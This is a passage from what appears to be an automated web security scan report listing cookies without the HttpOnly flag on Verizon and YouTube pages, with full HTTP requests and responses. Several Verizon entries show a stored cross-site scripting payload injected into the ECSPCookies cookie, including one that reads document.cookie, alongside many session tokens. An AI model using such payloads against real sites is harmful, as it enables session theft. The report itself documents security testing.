Referer: http://www.verizonbusiness.com/Medium/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262200|VP%3d1|RMC%3dxg|LP%3den; __utma=58777642.1910521591.1315279004.1315279004.1315279004.1; __utmb=58777642.5.9.1315279031192; __utmc=58777642; __utmz=58777642.1315279004.1.1.utmcsr=www22.verizon.com|utmccn=(referral)|utmcmd=referral|utmcct=/content/verizonglobalhome/ghp_business.aspx

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: "5253d46cfeae5ec60b43ca341768ecf3"
Last-Modified: Mon, 05 Sep 2011 22:17:44 GMT
Vary: *
Server: Roxen/4.5.146-release3
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 20846
Date: Mon, 05 Sep 2011 22:17:45 GMT
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262264|VP%3d5|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:21:28 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:17:44 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...

10.116. http://www.verizonbusiness.com/about/ipinnovation/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /about/ipinnovation/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/ipinnovation/ HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud+Based+Managed+Data+Protection+Solution.xml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262243|VP%3d2|RMC%3dxg|LP%3den; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.1.10.1315279065; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "2cc42523912f8dd3e6e8f7da028c3456"
Last-Modified: Mon, 05 Sep 2011 22:18:16 GMT
Vary: *
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 28468
Date: Mon, 05 Sep 2011 22:18:17 GMT
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262296|VP%3d3|RMC%3dxg|LP%3den%00568ab"%3b816280f424; expires=Mon, 05 Sep 2016 03:22:00 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:18:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(13:09:02)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

10.117. http://www.verizonbusiness.com/us/Products/networking/internet/ipv6/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /us/Products/networking/internet/ipv6/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/Products/networking/internet/ipv6/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "7ccf9e359df2b6054bf13169efbf9ab9"
Last-Modified: Mon, 05 Sep 2011 22:37:04 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Mon, 05 Sep 2011 22:37:04 GMT
Content-Length: 27349
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263423|VP%3d60|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:47 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:37:04 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...

10.118. http://www.verizonwireless.com/b2c/store/controller

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b2c/store/controller?item=phoneFirst&action=viewStoreIndex HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewStoreIndex
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; gnVersion=2011Jul31030844; mybizCookie=true; mbox=session#1315278939788-568601#1315280871|PC#1315278939788-568601.19#1316488611|check#true#1315279071; CP=null*; SESSION_VALUE=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1!1315260938371; TIME_CHECKER=1315261253093; __utma=96859928.1921319434.1315279254.1315279254.1315279254.1; __utmb=96859928; __utmc=96859928; __utmz=96859928.1315279254.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ZIPCODE=10010; CITY=New York; STATE=NY

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="Set-Cookie"
Connection: close
Date: Mon, 05 Sep 2011 22:20:58 GMT
Location: http://www.verizonwireless.com:80/b2c/store/controller?&item=phoneFirst&action=viewStoreIndex
Set-Cookie: CARTVIEW=FALSE; domain=.verizonwireless.com; expires=Monday, 05-Sep-2011 22:40:58 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 397

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.verizonwireless.com:80/
...[SNIP]...

10.119. http://www.verizonwireless.com/b2c/vzwfly

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/vzwfly

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /b2c/vzwfly HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewStoreIndex
Content-Length: 173
Cache-Control: max-age=0
Origin: http://www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; gnVersion=2011Jul31030844; mybizCookie=true; mbox=session#1315278939788-568601#1315280871|PC#1315278939788-568601.19#1316488611|check#true#1315279071; CP=null*; SESSION_VALUE=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1!1315260938371; TIME_CHECKER=1315261253093; __utma=96859928.1921319434.1315279254.1315279254.1315279254.1; __utmb=96859928; __utmc=96859928; __utmz=96859928.1315279254.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

query=item%3DphoneFirst%26action%3DviewStoreIndex%26go%3D%2Fstore%2Fcontroller%26&fd=&go=%2Fstore%2Fcontroller&zipcode=10010&rememberMyZip=&state=&prevstate=&change=&filter=

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="Set-Cookie"
Connection: close
Date: Mon, 05 Sep 2011 22:20:58 GMT
Location: http://www.verizonwireless.com:80/b2c/store/controller?item=phoneFirst&action=viewStoreIndex
Set-Cookie: CARTVIEW=FALSE; domain=.verizonwireless.com; expires=Monday, 05-Sep-2011 22:40:58 GMT; path=/
Set-Cookie: ZIPCODE=10010; domain=.verizonwireless.com; expires=Sunday, 04-Dec-2011 22:20:58 GMT; path=/
Set-Cookie: CITY=New York; domain=.verizonwireless.com; expires=Sunday, 04-Dec-2011 22:20:58 GMT; path=/
Set-Cookie: STATE=NY; domain=.verizonwireless.com; expires=Sunday, 04-Dec-2011 22:20:58 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 387

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.verizonwireless.com:80/
...[SNIP]...

10.120. http://www.youtube.com/results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /results

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /results HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:37:09 GMT
Server: wiseguy/0.6.10
X-Content-Type-Options: nosniff
Set-Cookie: GEO=797cb795181fd5a70728e4cd351d4ac7cwsAAAAzVVMyF3tqTmVPFQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: pZGJ4MVNHYWdRd0pTTThUdXFGYVdNUkxhSExubThCRDd1U0I2UjFueWRNWFFWaEdjXzFjVi1B -->
<head>

<script>
var yt = yt || {};yt.timing = yt.timin
...[SNIP]...

10.121. http://www22.verizon.com/ResidentialHelp/FiOSTV/Guide/Enhanced+TV/QuestionsOne/124941.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /ResidentialHelp/FiOSTV/Guide/Enhanced+TV/QuestionsOne/124941.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ResidentialHelp/FiOSTV/Guide/Enhanced+TV/QuestionsOne/124941.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 248796
Expires: Mon, 05 Sep 2011 22:37:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:24 GMT
Connection: close
Set-Cookie: ContextInfo_Partner=VZO; path=/
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>prompt("StoredXSS")</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:37:24 GMT; path=/
Set-Cookie: ContextInfo_TV=FiOSTV; expires=Wed, 05-Sep-2012 22:37:24 GMT; path=/
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>prompt("StoredXSS")</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:37:24 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<HEAD id="ctl00_head"><title>
   Verizon | F
...[SNIP]...

10.122. http://www22.verizon.com/ResidentialHelp/templates/layers/setpreferences_generic.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /ResidentialHelp/templates/layers/setpreferences_generic.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /ResidentialHelp/templates/layers/setpreferences_generic.aspx?TabValue=TV HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/templates/layers/setpreferences_generic.aspx?TabValue=TV
Content-Length: 253
Cache-Control: max-age=0
Origin: http://www22.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CMS_TimeZoneOffset=300; refURL=http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm; RecentlyVisited=Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; CP=null*

__VIEWSTATE=%2FwEPDwUJOTA4NjkzMTc0D2QWAmYPZBYEZg8WAh4HVmlzaWJsZWgWAgIBDxBkZBYAZAICDxYCHwBoZGQ%3D&_ctl00_Template_Wrapper_Begin1_HdnPageName=&_ctl00_Template_Wrapper_Begin1_HdnPageTitle=&_ctl00_Templat
...[SNIP]...

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 8418
Date: Mon, 05 Sep 2011 22:24:29 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; path=/
Set-Cookie: ContextInfo_TV=FiOSTV; expires=Wed, 05-Sep-2012 22:24:29 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title class="inf
...[SNIP]...

10.123. http://www22.verizon.com/content/ContactUs/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /content/ContactUs/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/ContactUs/ HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; CMS_TimeZoneOffset=300; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; 
vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; IHAClientIP=112.64.2.103; CP=null*; refURL=http://www22.verizon.com/residentialhelp/fiostv

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 238563
Expires: Mon, 05 Sep 2011 22:38:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:38:27 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=s&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:38:27 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<HEAD id="ctl00_head"><title>
   Verizon | R
...[SNIP]...

10.124. http://www22.verizon.com/content/commontemplates/validlogin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /content/commontemplates/validlogin.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/commontemplates/validlogin.aspx HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/javascript; charset=utf-8
Content-Length: 638
Expires: Mon, 05 Sep 2011 22:24:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:10 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:29:10 GMT; path=/content/; domain=verizon.com

var aType=new Array("retailconsumer","retailgeneralbiz","eservices");var aLOB=new Array("myvz","myvzquickpay","concos","rescos","smbcos","retailgenbiz","retailconsumer","callassistant");var ckType='';
...[SNIP]...

10.125. http://www22.verizon.com/content/verizonglobalhome/Intermediate.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /content/verizonglobalhome/Intermediate.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

